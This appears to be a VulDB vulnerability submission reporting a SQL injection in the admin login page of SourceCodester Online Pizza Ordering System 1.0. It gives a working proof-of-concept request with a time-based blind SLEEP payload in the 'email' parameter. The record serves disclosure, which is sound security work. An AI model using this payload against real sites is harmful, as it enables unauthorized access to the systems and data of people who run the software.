| Titel | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
|---|
| Beschreibung | A SQL Injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0, remote and unauthenticated attacker can exploit this vulnerability by sending crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page.The parameter 'email' is injectable.
An effective poc is below
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
which is a time-based blind injection and the server will response in 5s. |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 17.03.2023 07:47 (vor 3 Jahren) |
|---|
| Moderieren | 17.03.2023 07:58 (12 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email SQL Injection] |
|---|
| Punkte | 20 |
|---|